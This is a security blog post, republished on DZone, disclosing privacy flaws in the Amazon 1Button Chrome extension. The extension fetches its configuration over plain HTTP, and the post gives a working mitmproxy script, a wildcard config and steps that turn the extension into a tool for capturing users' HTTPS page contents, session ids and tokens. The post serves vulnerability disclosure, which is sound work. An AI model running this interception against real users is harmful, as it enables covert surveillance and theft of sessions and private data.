Over a million developers have joined DZone.

Jealous of PRISM? Use "Amazon 1 Button" Chrome extension to sniff all HTTPS websites!

· Cloud Zone

Download the Essential Cloud Buyer’s Guide to learn important factors to consider before selecting a provider as well as buying criteria to help you make the best decision for your infrastructure needs, brought to you in partnership with Internap.

 Insecure browser addons may leak all your encrypted SSL traffic, exploits included

So, Snowden let the cat out of the bag. They're listening - the news are so big, that feds are no longer welcome at DEFCON. But let's all be honest - who doesn't like to snoop into other person's secrets? We all know how to set up rogue AP and use ettercap. Setting up your own wall of sheep is trivial. I think we can safely assume - plaintext traffic is dead easy to sniff and modify.

The real deal though is in the encrypted traffic. In browser's world that means all the juicy stuff is sent over HTTPS. Though intercepting HTTPS connections is possible, we can only do it via: 

  • hacking the CA
  • social engineering (install the certificate) 
  • relying on click-through syndrome for SSL warnings

Too hard. Let's try some side channels. Let me show you how you can view all SSL encrypted data, via exploiting Amazon 1Button App installed on your victims' browsers. 


Some short info about our hero of the day:

Amazon 1Button App Chrome extension
Version: 3.2013.627.0
Updated: June 28, 2013
1,791,011 users (scary, becase the extension needs the following permissions):


First, a little info about how it abuses your privacy, in case you use it already (tldr; uninstall NOW!). There's a few interesting things going on (all of them require no user interaction and are based on default settings):

It reports to Amazon every URL you visit, even HTTPS URLs.

GET /gp/bit/apps/web/SIA/scraper?url=https://gist.github.com/ HTTP/1.1
Host: www.amazon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Referer: https://gist.github.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,pl;q=0.6
Cookie: lots-of-amazon-cookies

Unfortunately, this request goes over HTTPS, so only Amazon can know your URLs. You might want to look at Firefox version of the extension though (hint, hint).

It's against what they claim in their Privacy Policy:

The Amazon Browser Apps may also collect information about the websites you view, but that information is not associated with your Amazon account or identified with you. 

Well, request to https://www.amazon.com/gp/bit/apps/web/SIA/scraper?url=https://gist.github.com/ sends a lot of my Amazon cookies, doesn't it? But that's just a start.

Amazon XSS-es every website you visit

So called SIA feature of the extension is just that: 

// main.js in extension code
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
    if (siaEnabled && changeInfo.status === 'complete') {
        Logger.log('Injecting SIA');
        storage.get('options.ubp_root', function(options_root) {
            var root = options_root['options.ubp_root']
            chrome.tabs.executeScript(null, { code: "(function() { var s = document.createElement('script'); s.src = \"" + root + "/gp/bit/apps/web/SIA/scraper?url=\" + document.location.href; document.body.appendChild(s);}());" });

So, it attaches external <script> on any website, and its code can be tailored to the exact URL of the page. To be fair, currently the script for all tested websites is just a harmless function.

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jul 2013 11:14:34 GMT
Content-Type: text/javascript; charset=UTF-8

So it's just like a ninja sent to every house that just awaits for further orders. /me doesn't like this anyway. Who knows what sites are modified, maybe it depends on your location, Amazon ID etc.

It reports contents of certain websites you visit to Alexa

Yes, not just URLs. For example, your Google searches over HTTPS, and a few first results are now known to Alexa as well.

POST http://widgets.alexa.com/traffic/rankr/?ref=https%3A%2F%2Fwww.google.pl%2Fsearch%3F...t%2526q%253Dhow%252Bto%252Boverthrow%252Ba%252Bgovernment... HTTP/1.1
Host: widgets.alexa.com
Proxy-Connection: keep-alive
Content-Length: 662
accept: application/xml
Origin: chrome-extension://pbjikboenpfhbbejgkoklgkhjpfogcam
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,pl;q=0.6
Cookie: aid=JRDTh1rpFM00ES

Here's exemplary Google search and a view of what's sent over the proxy. 


Notice that the URL and extracted page information travels over HTTP tohttp://widgets.alexa.com. So in man-in-the-middle attackers can access the information that extension is configured to send to Alexa.

Bottom line - Amazon is evil. 


The real problem though is that attackers can actively exploit described extension features to hijack your information, e.g. get access to your HTTPS URLs and page contents. Extension dynamically configures itself by fetching information from Amazon. Namely, upon installation (and then periodically) it requests and processes two config files. Exemplary config is presented below: 

// httpsdatalist.dat
// search_conf.js
  "google" : {
    "urlexp" : "http(s)?:\\/\\/www\\.google\\..*\\/.*[?#&]q=([^&]+)",
    "rankometer" :  {
      "url"   :"http(s)?:\\/\\/(www(|[0-9])|encrypted)\\.(|l\\.)google\\..*\\/",
      "reload": true,
      "xpath" : {
        "block": [
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]",
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]",
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]"
        "insert" : [
          "./div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite",
          "./div/div/div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite"
        "target" : [
          "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href",
          "./h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href",
          "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href"

First file defines what HTTPS sites can be inspected. The second file defines URL patterns to watch for, and XPath expressions to extract content being reported back to Alexa. The files are fetched from these URLs: 

Yes. The configuration for reporting extremely private data is sent over plaintext HTTP. WTF, Amazon?


Exploiting this is very simple:

  1. Set up/simulate a HTTP man-in-the-middle
  2. Listen for HTTP requests for above config files
  3. Respond with wildcard configuration (listen to all https:// sites & extract whole body)
  4. Log all subsequest HTTP requests to Alexa, gathering previously encrypted client webpages.

For demonstration purposes, I've made a mitmproxy script that converts Amazon 1Button Chrome extension to poor man's transparent HTTPS->HTTP proxy.

#!/usr/bin/env python
def start(sc):
    sc.log("Amazon One Click pwner started")
def response(sc, f):
    if f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/search_conf.js'):
        f.response.decode() # removes gzip header
        f.response.content = open('pwn.json','r').read()
    elif f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/httpsdatalist.dat'):
        f.response.decode() # removes gzip header
        f.response.content = '["https://"]' # log'em all
def request(sc, f):
    if f.request.path.startswith('/traffic/rankr/'):
        q = f.request.get_query()
        p = q.get_first('ref')
        if p and f.request.content:
            c = open('pwn.log', 'a')
            c.write(p + "\n" + f.request.get_decoded_content() + "\n============\n")

and complimetary pwn.json:

  "pwn" : {
    "urlexp" : "http(s)?:\\/\\/",
    "rankometer" :  {
      "url"   :"http(s)?:\\/\\/",
      "reload": true,
      "xpath" : {
        "block": [
        "insert" : [
        "target" : [
    "cba" : {
        "url"   :"http(s)?:\\/\\/",
        "reload": true

To start the attack, simply route all HTTP (port 80) traffic to mitmproxy and launch the script: 

$ mitmproxy -s pwn.py

Now install the extension in your Chrome (or disable and enable it to quickly reload configuration) and start browsing. All captured HTTPS data will be in pwn.log file. 


  • We are limited to XPath expressions to retrieve content, so I can't return the usual HTML source, nor can I access headers etc. The closest I got is string value of //html node, which is somewhat the content of all text nodes on a page
  • AJAX applications snooping works poorly, as the extension does not report XMLHttpRequestresponses
  • We are only passively listening, no option to modify traffic 
Nevertheless, there's plenty of private info in captured traffic. CSRF tokens, session ids, email contents, Google Drive document content, you name it. Thank you, Amazon, for protecting my privacy. But seriously - move all your extension traffic to HTTPS only. Better yet, remove the tracking code altogether.

I've done other research on Google Chrome extension security, read more if you found the topic interesting. 

The Cloud Zone is brought to you in partnership with Internap. Read Bare-Metal Cloud 101 to learn about bare-metal cloud and how it has emerged as a way to complement virtualized services.


Published at DZone with permission of Krzysztof Kotowicz , DZone MVB. See the original article here.

Opinions expressed by DZone contributors are their own.

The best of DZone straight to your inbox.

Please provide a valid email address.

Thanks for subscribing!

Awesome! Check your inbox to verify your email so you can start receiving the latest in tech news and resources.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}